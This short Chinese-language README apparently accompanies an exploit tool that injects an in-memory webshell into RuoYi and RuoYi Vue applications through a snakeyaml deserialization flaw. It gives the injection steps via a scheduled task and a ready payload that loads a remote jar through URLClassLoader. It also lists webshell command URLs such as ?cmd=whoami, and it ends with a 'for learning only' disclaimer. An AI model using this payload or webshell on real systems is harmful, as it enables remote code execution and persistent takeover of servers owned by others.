分析文章
注入方法:
把jar放到系统可以访问的地方,在定时任务创建新的定时任务,再立即执行一次即可
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["you_url_of_jar"]]]]')
若依 snakeyaml 反序列化漏洞注入内存马
RuoYi
RuoYi Vue
/dev-api/?cmd=whoami
/dev-api/?cmd=delete
项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责